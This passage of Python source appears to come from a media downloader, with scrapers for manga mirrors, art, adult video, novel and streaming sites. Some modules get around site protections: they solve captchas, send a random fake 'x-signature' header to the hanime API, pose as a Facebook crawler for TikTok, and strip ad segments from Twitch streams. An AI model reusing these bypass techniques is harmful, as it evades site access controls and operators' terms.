self.urls.append(img) self.title = self.name def get_artist(soup): view = soup.find('div', class_='view-title', err='no title') text = view.text.replace('\n', '#') artist = re.find(r'작가[ #]*:[ #]*(.+?)#', text, default='N/A').strip() return artist @limits(10) def get_soup(url, session=None, cw=None, win=None): if session is None: session = Session() virgin = True def f(html, browser=None): nonlocal virgin soup = Soup(html) if soup.find('form', {'name':'fcaptcha'}): #4660 browser.show() if virgin: virgin = False browser.runJavaScript('window.scrollTo({top: document.getElementsByClassName("form-box")[0].getBoundingClientRect().top-150})') #5504 return False browser.hide() return True res = clf2.solve(url, session=session, f=f, cw=cw, win=win) soup = Soup(res['html'], apply_css=True) return session, soup, res['url'] def get_pages(url, soup, sub=False): list = soup.find('ul', class_='list-body') pages = [] for item in list.findAll('div', 'wr-subject'): for span in item.a.findAll('span'): span.decompose() title = item.a.text.strip() href = item.a['href'] href = urljoin(url, href) pages.append((title, href)) if not pages: raise Exception('no pages') ## if sub: #4909 ## return pages ## else: ## pg = soup.find('ul', class_='pagination') ## as_ = pg.findAll('a') ## for a in as_: ## href = a.get('href') ## if not href: ## continue ## href = urljoin(url, href) ## for try_ in range(2): ## try: ## session, soup2, href = get_soup(href) ## pages += get_pages(href, soup2, sub=True) ## break ## except Exception as e: ## e_ = e ## print(e) ## else: ## raise e_ titles = {} pages_ = [] for title, href in pages[::-1]: title = utils.fix_dup(title, titles) #4161 page = Page(title, href) pages_.append(page) return pages_ @page_selector.register('manatoki') def f(url, win): session, soup, url = get_soup(url, win=win) list = soup.find('ul', class_='list-body') if list is None: raise Exception(tr_('목록 주소를 입력해주세요')) pages = get_pages(url, soup) return pages def get_imgs(url, title, soup=None, session=None, cw=None): print_ = get_print(cw) if soup is None or session is None: session, soup, url = get_soup(url, session, cw) pages = get_pages(url, soup) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('manatoki', title, page, cw) if imgs_already: imgs += imgs_already continue imgs_ = get_imgs_page(page, title, url, session, cw) imgs += imgs_ s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) print_('{} {}'.format(page.title, len(imgs_))) if cw is not None: cw.setTitle(s) else: print('read page... {} ({})'.format(page.url, len(imgs))) return imgs @try_n(4) def get_imgs_page(page, title, referer, session, cw): print_ = get_print(cw) # 2183 session, soup, page.url = get_soup(page.url, session, cw) title_page = page.title#clean_title(soup.find('span', class_='page-desc').text.strip()) if page.title != title_page: print_('{} -> {}'.format(page.title, title_page)) page.title = title_page views = soup.findAll('div', class_='view-content')\ + soup.findAll('div', class_='view-padding') if not views: raise Exception('no views') hash = re.find(r'''data_attribute\s*:\s*['"](.+?)['"]''', soup.html) print_('hash: {}'.format(hash)) if hash is None: raise Exception('no hash') imgs = [] for view in views: if view is None: continue for img in view.findAll('img'): if not isVisible(img): continue src = img.get('data-{}'.format(hash)) src = src or img.get('content') # https://manatoki77.net/comic/5266935 if not src: continue img = urljoin(page.url, src) if '/img/cang' in img: continue if '/img/blank.gif' in img: continue img = File_manatoki({'referer': page.url, 'url': img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) ## if not imgs: ## raise Exception('no imgs') return imgs def isVisible(tag): while tag: if re.search(r'display:\s*none', tag.get('style', ''), re.I): return False tag = tag.parent return True File: src/extractor/talk_op_gg_downloader.py # coding: UTF-8 # title: Download talk op.gg image # author: SaidBySolo # comment: op.gg 커뮤니티의 이미지를 다운로드합니다 """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import requests from utils import Downloader, Soup class DownloaderTalkOPGG(Downloader): type = "talkopgg" URLS = ["talk.op.gg"] def init(self) -> None: pass def read(self) -> None: response = requests.get(self.url) soup = Soup(response.text) self.title = soup.find("title").text image_element_list = soup.find("div", class_="article-content").findAll("img") for image_element in image_element_list: self.urls.append(image_element["src"]) File: src/extractor/newgrounds_downloader.py # coding:utf8 from datetime import datetime import downloader import errors from functools import reduce import os import ree as re from timee import sleep from translator import tr_ from utils import Downloader, clean_title, Session, get_print, try_n, check_alive class Downloader_newgrounds(Downloader): type = 'newgrounds' URLS = ['newgrounds.com'] ACCEPT_COOKIES = [r'(.*\.)?newgrounds\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): user = re.find(r'(?:http(?:s)?://)?([^\.]+).newgrounds.com', url.lower()) if not user or user == 'www': user = re.find(r'newgrounds.com/art/view/([^/?#]+)', url, err='no user id') return 'https://{}.newgrounds.com/art'.format(user) def read(self): user = re.find('(?:http(?:s)?://)?([^\.]+).newgrounds.com', self.url.lower()) title = clean_title(user) for img in get_imgs(user, title, self.session, self.cw): self.urls.append(img.url) self.filenames[img.url] = img.filename self.title = title class Image: def __init__(self, url, filename=None): self.url = url if filename is None: filename = os.path.basename(url) self.filename = filename @try_n(10, sleep=20) def get_posts(url, params, session, print_): posts, data, items = [], None, None try: data = session.get(url, params=params).json() items = data.get('items') if items: for item in reduce(lambda x, y: x + y, items.values()): posts.append(re.find('(?<=href=")([^"]+)', item)) except Exception as e: print_('failed to get posts') print_('no. posts: {}'.format(len(posts))) print_('data: {}'.format(data)) print_('items: {}'.format(items)) raise e return posts @try_n(10, sleep=20) def get_html(post, session): return downloader.read_html(post, session=session) def get_img(post, session, print_): html, url, name, ext, _datetime = None, None, None, None, None try: html = get_html(post, session) if 'You must be logged in, and at least 18 years of age to view this content!' in html: raise errors.LoginRequired() url = re.find('(?<="full_image_text":"<img src=\\\\")([^"]+)', html).replace('\\', '') name = re.find('(?<=alt=\\\\")([^\\\\]+)', html) ext = os.path.splitext(url)[1].split('?')[0] _datetime = datetime.strptime(re.find('(?<="datePublished" content=")([^"]+)', html), '%Y-%m-%dT%H:%M:%S%z') except Exception as e: print_('failed to get images') print_('post: {}'.format(post)) print_('url: {}'.format(url)) print_('name: {}'.format(name)) print_('ext: {}'.format(ext)) print_('_datetime: {}'.format(_datetime)) raise e return Image(url=url, filename='[{}] {}{}'.format(_datetime.strftime("%Y-%m-%d"), name, ext)) def get_imgs(user, title, session, cw=None): print_ = get_print(cw) imgs = [] url = 'https://{}.newgrounds.com/art'.format(user) params = {'page': 1, 'isAjaxRequest': 1} while check_alive(cw): posts = get_posts(url, params, session, print_) if not posts: break for post in posts: sleep(0.75) imgs.append(get_img(post, session, print_)) s = '{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs)) if cw: cw.setTitle(s) print_('processed: {}'.format(len(imgs))) print_('page: {}'.format(params['page'])) params['page'] += 1 return imgs File: src/extractor/xnxx_downloader.py import downloader from utils import Soup, Downloader, LazyUrl, format_filename import ree as re from m3u8_tools import playlist2stream from io import BytesIO as IO class Video: def __init__(self, url, url_page, title, url_thumb): self._url = url self.url = LazyUrl(url_page, self.get, self) self.id = get_id(url_page) self.title = title self.filename = format_filename(title, self.id, '.mp4') f = IO() self.url_thumb = url_thumb downloader.download(url_thumb, buffer=f) self.thumb = f def get(self, _): return self._url def get_id(url): return url.split('xnxx.com/')[1].split('/')[0] class Downloader_xnxx(Downloader): type = 'xnxx' URLS = [r'regex:xnxx[0-9]*\.(com|es)'] single = True display_name = 'XNXX' ACCEPT_COOKIES = [r'(.*\.)?xnxx[0-9]*\.(com|es)'] @classmethod def fix_url(cls, url): return re.sub(r'xnxx[0-9]*\.(com|es)', 'xnxx.com', url) def read(self): video = get_video(self.url) self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title def get_video(url): html = downloader.read_html(url) soup = Soup(html) for script in soup.findAll('script'): script = script.text or script.string or '' hls = re.find(r'''html5player\.setVideoHLS\(['"](.+?)['"]''', script) if hls: break else: raise Exception('No VideoHLS') video = playlist2stream(hls) title = get_title(soup) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'].strip() video = Video(video, url, title, url_thumb) return video def get_title(soup): return soup.find('meta', {'property': 'og:title'}).attrs['content'].strip() File: src/extractor/baraag_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session from mastodon import get_info import ree as re def get_id(url): return re.find('baraag.net/([^/]+)', url.lower()) class Downloader_baraag(Downloader): type = 'baraag' URLS = ['baraag.net'] display_name = 'baraag.net' ACCEPT_COOKIES = [r'(.*\.)?baraag\.net'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) or url return f'https://baraag.net/{id_}' def read(self): id_ = get_id(self.url) info = get_info('baraag.net', id_, f'baraag_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (baraag_{})'.format(info['title'], id_)) File: src/extractor/navertv_downloader.py import downloader import ree as re from io import BytesIO as IO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl class Downloader_navertv(Downloader): type = 'navertv' single = True URLS = ['tv.naver.com'] display_name = 'Naver TV' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] @classmethod def fix_url(cls, url): if not re.match(r'https?://.+', url, re.I): url = f'https://tv.naver.com/v/{url}' return url def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(4) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['protocol'] in ['http', 'https']] fs = sorted(fs, key=lambda f: int(f.get('width', 0)), reverse=True) if not fs: raise Exception('No MP4 videos') f = fs[0] self._url = f['url'] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] id = info['id'] ext = get_ext(self._url) self.filename = format_filename(self.title, id, ext) return self._url File: src/extractor/lhscan_downloader.py #coding:utf8 import downloader from utils import Soup, urljoin, LazyUrl, Downloader, try_n, Session, clean_title, get_print, check_alive import os from translator import tr_ import page_selector import clf2 import utils import base64 import ree as re import errors ##from image_reader import QPixmap class Image: def __init__(self, url, page, p): self._url = url self.url = LazyUrl(page.url, self.get, self)#, pp=self.pp) ext = os.path.splitext(url)[1] if ext.lower()[1:] not in ['jpg', 'jpeg', 'bmp', 'png', 'gif', 'webm', 'webp']: ext = '.jpg' self.filename = '{}/{:04}{}'.format(page.title, p, ext) def get(self, _): return self._url ## def pp(self, filename): ## pixmap = QPixmap(filename) ## pixmap.save(filename) ## return filename class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url def get_soup_session(url, cw=None, win=None): print_ = get_print(cw) session = Session() res = clf2.solve(url, session=session, cw=cw, win=win) print_('{} -> {}'.format(url, res['url'])) if res['url'].rstrip('/') == 'https://welovemanga.one': raise errors.LoginRequired() return Soup(res['html']), session class Downloader_lhscan(Downloader): type = 'lhscan' URLS = [ #'lhscan.net', 'loveheaven.net', 'lovehug.net', 'welovemanga.', 'nicomanga.com', ] MAX_CORE = 16 display_name = 'LHScan' ACCEPT_COOKIES = [rf'(.*\.)?{domain}' for domain in URLS] def init(self): self.soup, self.session = get_soup_session(self.url, self.cw) try: self.name except: raise errors.Invalid('{}: {}'.format(tr_('목록 주소를 입력해주세요'), self.url)) @classmethod def fix_url(cls, url): url = url.replace('lovehug.net', 'welovemanga.one') url = url.replace('welovemanga.net', 'welovemanga.one') #4298 return url @property def name(self): title = self.soup.find('ul', class_='manga-info').find('h3').text return clean_title(title) def read(self): self.title = tr_('읽는 중... {}').format(self.name) imgs = get_imgs(self.url, self.name, self.session, self.soup, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name @try_n(8) def get_imgs_page(page, referer, session, cw=None): print_ = get_print(cw) print_(page.title) html = downloader.read_html(page.url, referer, session=session) if clf2._is_captcha(Soup(html)): #4124 html = clf2.solve(page.url, session, cw)['html'] if not html: raise Exception('empty html') try: html = html.replace('{}='.format(re.find(r"\$\(this\)\.attr\('(.+?)'", html, err='no cn')), 'data-src=') except: #5351 pass soup = Soup(html) m = re.find(r'''(load_image|imgsListchap)\(([0-9]+)''', html) if m: #6186 cid = m[1] if utils.domain(page.url, 2).lower() == 'nicomanga.com': url_api = urljoin(page.url, f'/app/manga/controllers/cont.imgsList.php?cid={cid}') else: url_api = urljoin(page.url, f'/app/manga/controllers/cont.listImg.php?cid={cid}') soup = downloader.read_soup(url_api, page.url, session=session) imgs = [] for img in soup.findAll('img', class_='chapter-img'): src = img.get('data-pagespeed-lazy-src') or img.get('data-src') or img.get('data-srcset') or img.get('data-aload') or img.get('data-original') or img['src'] try: src = base64.b64decode(src).strip().decode('utf8') except: pass src0 = src src = src.replace('welovemanga.one', '1')# src = urljoin(page.url, src).strip() if 'Credit_LHScan_' in src or '5e1ad960d67b2_5e1ad962338c7' in src: continue if 'fe132b3d32acc39f5adcea9075bedad4LoveHeaven' in src: continue if 'LoveHug_600cfd96e98ff.jpg' in src: continue if 'image_5f0ecf23aed2e.png' in src: continue if '/uploads/lazy_loading.gif' in src: continue if '/xstaff.jpg.pagespeed.ic.gPQ2SGcYaN.webp' in src: continue if '/uploads/loading-mm.gif' in src: continue src = src.replace('\n', '').replace('\r', '') #5238 #6105 ## if 'proxy.php?link=' not in src: #5351 ## src = 'https://welovekai.com/proxy.php?link=' + src #5238 if not imgs: print_(src0) print_(src) img = Image(src, page, len(imgs)) imgs.append(img) return imgs def get_pages(url, session, soup=None, cw=None): if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) tab = soup.find('ul', class_='list-chapters') pages = [] for li in tab.findAll('li'): text = li.find('div', class_='chapter-name').text.strip() href = li.parent['href'] href = urljoin(url, href) page = Page(text, href) pages.append(page) if not pages: raise Exception('no pages') return pages[::-1] @page_selector.register('lhscan') def f(url, win): soup, session = get_soup_session(url, win=win) pages = get_pages(url, session, soup=soup) return pages @try_n(2) def get_imgs(url, title, session, soup=None, cw=None): if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) pages = get_pages(url, session, soup, cw) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs += get_imgs_page(page, url, session, cw) s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) if cw is not None: cw.setTitle(s) else: print(s) return imgs File: src/extractor/tiktok_downloader.py import downloader import ree as re from utils import Soup, LazyUrl, Downloader, try_n, compatstr, get_print, Session, get_max_range, format_filename, json import clf2 import ytdl from urllib.parse import unquote PATTERN_VID = '/(v|video)/(?P<id>[0-9]+)' SHOW = True def is_captcha(soup, cw=None): r = soup.find('div', class_="verify-wrap") or soup.find('div', class_='captcha_verify_container') if r: get_print(cw)('captcha') return r class Downloader_tiktok(Downloader): type = 'tiktok' single = True URLS = ['tiktok.com', 'douyin.com'] display_name = 'TikTok' ACCEPT_COOKIES = [r'(.*\.)?(tiktok|douyin)\.com'] def init(self): cw = self.cw self.session = Session() res = clf2.solve(self.url, self.session, cw) soup = Soup(res['html']) if is_captcha(soup, cw): def f(html): return not is_captcha(Soup(html)) res = clf2.solve(self.url, self.session, cw, show=True, f=f) self.url = self.fix_url(res['url']) #4324 @classmethod def fix_url(cls, url): url = url.split('?')[0].split('#')[0].strip('/') if '://' not in url: url = 'https://www.tiktok.com/@{}'.format(url) return url def read(self): format = compatstr(self.ui_setting.youtubeFormat.currentText()).lower().strip() def parse_video_url(info, item): if 'url' in item: return item['url'] if 'tiktok.com' in self.url.lower(): # TikTok return 'https://www.tiktok.com/@{}/video/{}'.format(info.get('uid', ''), item['id']) #5235 else: # Douyin return 'https://www.douyin.com/video/{}'.format(item['id']) if re.search(PATTERN_VID, self.url): # single video video = Video(self.url, self.session, format, self.cw) video.url() self.urls.append(video.url) self.title = video.title elif 'tiktok.com/tag/' in self.url or 'douyin.com/search/' in self.url: # tag search tag = re.find(r'/(tag|search)/([^/#\?]+)', self.url)[1] tag = unquote(tag) title = '#{}'.format(tag) info = read_channel(self.url, self.session, self.cw, title=title) items = info['items'] videos = [Video(parse_video_url(info, item), self.session, format, self.cw) for item in items] video = self.process_playlist(title, videos) elif 'tiktok.com/@' in self.url or 'douyin.com/user/' in self.url: # channel info = read_channel(self.url, self.session, self.cw) items = info['items'] videos = [Video(parse_video_url(info, item), self.session, format, self.cw) for item in items] title = '{} (tiktok_{})'.format(info['nickname'], info['uid']) video = self.process_playlist(title, videos) else: raise NotImplementedError() class Video: _url = None def __init__(self, url, session, format, cw): self.url = LazyUrl(url, self.get, self) self.session = session self.format = format self.cw = cw @try_n(2) def get(self, url): if self._url: return self._url m = re.search(PATTERN_VID, url) id = m.group('id') ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) ext = '.mp4' self.title = info['title'] self.filename = format_filename(self.title, id, ext) self._url = info['url'] return self._url def read_channel(url, session, cw=None, title=None): info = {} info['items'] = [] if 'tiktok.com' in url.lower(): # TikTok soup = downloader.read_soup(url, session=session, user_agent='facebookexternalhit/1.1') info['uid'] = re.find(r'/@([\w\.-]+)', soup.find('meta', {'property': 'og:url'})['content'], err='no uid') nick = soup.find('meta', {'property': 'og:title'})['content'] if nick.endswith(' on TikTok'): nick = nick[:-len(' on TikTok')] info['nickname'] = nick else: # Douyin def f(html, browser=None): soup = Soup(html) if is_captcha(soup): browser.show() return False try: info['uid'] = re.find(r'''uniqueId%22%3A%22(.+?)%22''', html, err='no uid') info['nickname'] = json.loads(re.findall(r'''"name"\s*:\s*(".+?")''', html)[-1]) #5896 return True except: return False clf2.solve(url, session, cw, f=f) options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } ydl = ytdl.YoutubeDL(options, cw=cw) info_ = ydl.extract_info(url) for e in info_['entries']: info['items'].append({'url': e['webpage_url']}) if not info['items']: raise Exception('no items') return info File: src/extractor/hanime_downloader.py import downloader from utils import Session, Downloader, try_n, Soup, format_filename, get_print, get_resolution, json import ree as re from io import BytesIO import os from timee import time from m3u8_tools import M3u8_stream from random import randrange class Video: def __init__(self, info, stream): self.info = info self.id = info['id'] self.title = info['name'] self.brand = info['brand'] self.url = stream['url'] self.url_thumb = info['poster_url'] self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) ext = os.path.splitext(self.url.split('?')[0].split('#')[0])[1] if ext.lower() == '.m3u8': ext = '.mp4' self.url = M3u8_stream(self.url, n_thread=4) for i, seg in self.url.urls[-20:]: seg._ignore_err = True #5272 else: size = downloader.get_size(self.url) if size <= 0: raise Exception('Size is 0') self.filename = format_filename('[{}] {}'.format(self.brand, self.title), self.id, ext) def __repr__(self): return f'Video({self.id})' class Downloader_hanime(Downloader): type = 'hanime' URLS = ['hanime.tv/hentai-videos/', 'hanime.tv/videos/'] single = True display_name = 'hanime.tv' ACCEPT_COOKIES = [r'(.*\.)?hanime\.tv'] def init(self): self.session = Session('chrome') def read(self): video = get_video(self.url, self.session, cw=self.cw) self.video = video self.urls.append(video.url) self.filenames[video.url] = video.filename self.setIcon(video.thumb) self.title = '[{}] {}'.format(video.brand, video.title) @try_n(8) def get_video(url, session, cw=None): print_ = get_print(cw) session.headers['X-Directive'] = 'api' html = downloader.read_html(url, session=session) soup = Soup(html) for script in soup.findAll('script'): script = script.text or script.string or '' data = re.find('window.__NUXT__=(.+)', script) if data is not None: data = data.strip() if data.endswith(';'): data = data[:-1] data = json.loads(data) break else: raise Exception('No __NUXT__') info = data['state']['data']['video']['hentai_video'] query = info['slug'] #url_api = 'https://members.hanime.tv/api/v3/videos_manifests/{}?'.format(query) # old url_api = 'https://hanime.tv/rapi/v7/videos_manifests/{}?'.format(query) # new hdr = { 'x-signature': ''.join('{:x}'.format(randrange(16)) for i in range(32)), 'x-signature-version': 'web2', 'x-time': str(int(time())), } r = session.get(url_api, headers=hdr) data = json.loads(r.text) streams = [] for server in data['videos_manifest']['servers']: streams += server['streams'] streams_good = [] for stream in streams: url_video = stream['url'] if not url_video or 'deprecated.' in url_video: continue stream['height'] = int(stream['height']) streams_good.append(stream) if not streams_good: raise Exception('No video available') res = get_resolution() def print_stream(stream): print_([stream['extension'], stream['height'], stream['filesize_mbs'], stream['url']]) steams_filtered = [] for stream in streams_good: print_stream(stream) if stream['height'] <= res: #3712 steams_filtered.append(stream) if steams_filtered: stream = sorted(steams_filtered, key=lambda _: _['height'])[-1] else: stream = sorted(streams_good, key=lambda _: _['height'])[0] print_('Final stream:') print_stream(stream) return Video(info, stream) File: src/extractor/kissjav_downloader.py import downloader from utils import urljoin, Downloader, LazyUrl, Session, try_n, format_filename, get_resolution, get_print import ree as re from io import BytesIO import clf2 class Downloader_kissjav(Downloader): type = 'kissjav' URLS = ['kissjav.com', 'kissjav.li', 'mrjav.net'] #4835 single = True display_name = 'KissJAV' ACCEPT_COOKIES = [r'(.*\.)?(kissjav|mrjav)\.(com|li|net)'] def read(self): self.session = Session()#get_session(self.url, cw=self.cw) video = get_video(self.url, self.session, self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment(1024*1024//2) self.title = video.title @try_n(2) def get_video(url, session, cw): print_ = get_print(cw) soup = downloader.read_soup(url, session=session) view = soup.find('div', id='player-container-fluid') fs = [] for source in view.findAll('source'): src = urljoin(url, source.attrs['src']) res = re.find('([0-9]+)p', source.attrs['title']) res = int(res) if res else 0 f = {'res': res, 'src': src} fs.append(f) print_(f) if not fs: raise Exception('No source') #4773 res = max(get_resolution(), min(f['res'] for f in fs)) print_(f'res: {res}') fs = sorted([f for f in fs if f['res'] <= res], key=lambda f: f['res']) f = fs[-1] print_(f'best: {f}') src_best = f['src'] title = soup.find('h1').text.strip() id = soup.find('div', id='video').attrs['data-id'] url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] #src_best = downloader.real_url(src_best) video = Video(src_best, url_thumb, url, title, id, session) return video class Video: def __init__(self, url, url_thumb, referer, title, id, session): self.title = title self.filename = format_filename(title, id, '.mp4') self.url = LazyUrl(referer, lambda x: url, self) self.thumb = BytesIO() self.url_thumb = url_thumb downloader.download(url_thumb, buffer=self.thumb, session=session) @try_n(2) def get_session(url, cw=None): session = Session() clf2.solve(url, session=session, cw=cw) return session File: src/extractor/kakuyomu_downloader.py #coding:utf8 import downloader import utils from utils import Soup, urljoin, Downloader, LazyUrl, try_n, clean_title, get_print, json, File import os from io import BytesIO from translator import tr_ class Page(File): type = 'kakuyomu' format = 'title' def __init__(self, info): info['title_all'] = clean_title('[{:04}] {}'.format(info['p'], info['title'])) d = { 'title': info['title_all'], } info['name'] = utils.format(self.type, d, '.txt') super().__init__(info) def get(self): text = get_text(self) f = BytesIO() f.write(text.encode('utf8')) f.seek(0) return {'url': f} class Downloader_kakuyomu(Downloader): type = 'kakuyomu' URLS = ['kakuyomu.jp'] MAX_CORE = 2 detect_removed = False display_name = 'カクヨム' ACCEPT_COOKIES = [r'(.*\.)?kakuyomu\.jp'] atts = ['info_title', 'info_description'] def read(self): self.info = get_info(self.url, cw=self.cw) self.artist = self.info['artist'] title_dir = clean_title('[{}] {}'.format(self.artist, self.info['title'])) outdir = utils.dir(self.type, title_dir, self.cw) self.urls += self.info['pages'] self.title = title_dir self.info_title = self.info['title'] self.info_description = self.info['description'] def post_processing(self): names = self.cw.names filename = clean_title('[merged] [{}] {}'.format(self.artist, self.info_title), n=-4) + '.txt' filename = os.path.join(self.dir, filename) try: with utils.open(filename, 'wb') as f: f.write(' {}\n\n 作者:{}\n\n\n'.format(self.info_title, self.artist).encode('utf8')) f.write(self.info_description.encode('utf8')) for i, file in enumerate(names): self.cw.pbar.setFormat('[%v/%m] {} [{}/{}]'.format(tr_('병합...'), i, len(names))) with open(file, 'rb') as f_: text = f_.read() f.write(b'\n\n\n\n') f.write(text) finally: self.cw.pbar.setFormat('[%v/%m]') @try_n(4, sleep=30) def get_text(page): html = downloader.read_html(page['referer']) soup = Soup(html) view = soup.find('div', class_='widget-episodeBody') story = view.text.strip() text = '''──────────────────────────────── ◆ {} {} ──────────────────────────────── {}'''.format(page['title_all'], page['date'], story) return text def get_info(url, soup=None, cw=None): print_ = get_print(cw) if soup is None: html = downloader.read_html(url) soup = Soup(html) info = {} rdata = soup.find('script', id='__NEXT_DATA__').string #6620 data = json.loads(rdata) wid = data['query']['workId'] info['title'] = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['title'] aid = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['author']['__ref'] info['artist'] = data['props']['pageProps']['__APOLLO_STATE__'][f'{aid}']['activityName'] catch = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}'].get('catchphrase') or '' intro = data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}'].get('introduction') or '' desc = ' {}{}'.format(catch, ('\n\n\n'+intro) if intro else '') info['description'] = desc eps = [] for tc in data['props']['pageProps']['__APOLLO_STATE__'][f'Work:{wid}']['tableOfContents']: _ = data['props']['pageProps']['__APOLLO_STATE__'][tc['__ref']].get('episodes') if _: eps += _ else: #6708 eps += data['props']['pageProps']['__APOLLO_STATE__'][tc['__ref']]['episodeUnions'] pages = [] for ep in eps: eid = ep['__ref'].split('Episode:')[1] href = urljoin(url, f'/works/{wid}/episodes/{eid}') subtitle = data['props']['pageProps']['__APOLLO_STATE__'][ep['__ref']]['title'] date = data['props']['pageProps']['__APOLLO_STATE__'][ep['__ref']]['publishedAt'] page = Page({'referer': href, 'title': subtitle, 'date': date, 'p': len(pages)+1}) pages.append(page) info['pages'] = pages return info File: src/extractor/mastodon_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session from mastodon import get_info import ree as re def get_id(url): return re.find('mastodon.social/([^/]+)', url.lower()) class Downloader_mastodon(Downloader): type = 'mastodon' URLS = ['mastodon.social'] ACCEPT_COOKIES = [r'(.*\.)?mastodon\.social'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) or url return f'https://mastodon.social/{id_}' def read(self): id_ = get_id(self.url) info = get_info('mastodon.social', id_, f'mastodon_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (mastodon_{})'.format(info['title'], id_)) File: src/extractor/twitch_downloader.py #coding: utf8 import downloader import ytdl from utils import Downloader, LazyUrl, try_n, format_filename, get_ext, Session, get_print, get_resolution, get_max_range, print_error, json from io import BytesIO from m3u8_tools import M3u8_stream import ree as re import errors import utils import os class Downloader_twitch(Downloader): type = 'twitch' URLS = ['twitch.tv'] single = True ACCEPT_COOKIES = [r'.*(twitch|ttvnw|jtvnw).*'] def init(self): url = self.url if 'twitch.tv' in url: if not url.startswith('http://') and not url.startswith('https://'): url = 'https://' + url self.url = url else: url = f'https://www.twitch.tv/videos/{url}' self.url = url self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('m.twitch.tv', 'www.twitch.tv') if re.search(r'/(videos|clips)\?filter=', url): return url.strip('/') url = url.split('?')[0].strip('/') filter = cls.get_filter(url) if filter == 'live': url = '/'.join(url.split('/')[:4]) return url @classmethod def get_filter(cls, url): if url.count('/') == 3: if 'www.twitch.tv' in url or '//twitch.tv' in url: filter = 'live' else: filter = None elif url.count('/') == 4: filter = re.find(r'filter=([0-9a-zA-Z_]+)', url) or re.find(r'[0-9a-zA-Z_]+', url.split('/')[-1]) if filter is not None and filter.isdigit(): filter = None else: filter = None if filter in ['about', 'schedule']: filter = 'live' return filter def read(self): if '/directory/' in self.url.lower(): raise errors.Invalid(f'[twitch] Directory is unsupported: {self.url}') filter = self.get_filter(self.url) if filter is None: video = Video(self.url, self.session, self.cw) video.url() self.urls.append(video.url) self.title = video.title elif filter == 'live': video = Video(self.url, self.session, self.cw, live=True) video.url() self.urls.append(video.url) self.title = os.path.splitext(video.filename)[0].replace(':', ':') elif filter == 'clips': info = get_videos(self.url, cw=self.cw) video = self.process_playlist('[Clip] {}'.format(info['name']), info['videos']) else: raise NotImplementedError(filter) self.artist = video.artist thumb = BytesIO() downloader.download(video.url_thumb, buffer=thumb) #5418 self.setIcon(thumb) if filter == 'live': d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = thumb.getvalue() utils.update_live(d, self.cw) @try_n(2) def get_videos(url, cw=None): print_ = get_print(cw) print_(f'get_videos: {url}') info = {} options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } videos = [] ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) for e in info['entries']: video = Video(e['url'], self.session, cw) video.id = int(e['id']) videos.append(video) if 'name' not in info: info['name'] = ydl.extract_info(e['url'])['creator'] if not videos: raise Exception('no videos') info['videos'] = sorted(videos, key=lambda video: video.id, reverse=True) return info def alter(seg, cw): if 'amazon' in seg.raw.title.lower(): get_print(cw)('strip ads') return [] segs = [] if '-muted' in seg.url: seg_ = seg.copy() seg_.url = seg.url.replace('-muted', '') segs.append(seg_) segs.append(seg) return segs def extract_info(url, cw=None): print_ = get_print(cw) ydl = ytdl.YoutubeDL(cw=cw) try: info = ydl.extract_info(url) except Exception as e: ex = type(ytdl.get_extractor(url))(ydl) _download_info = getattr(ex, 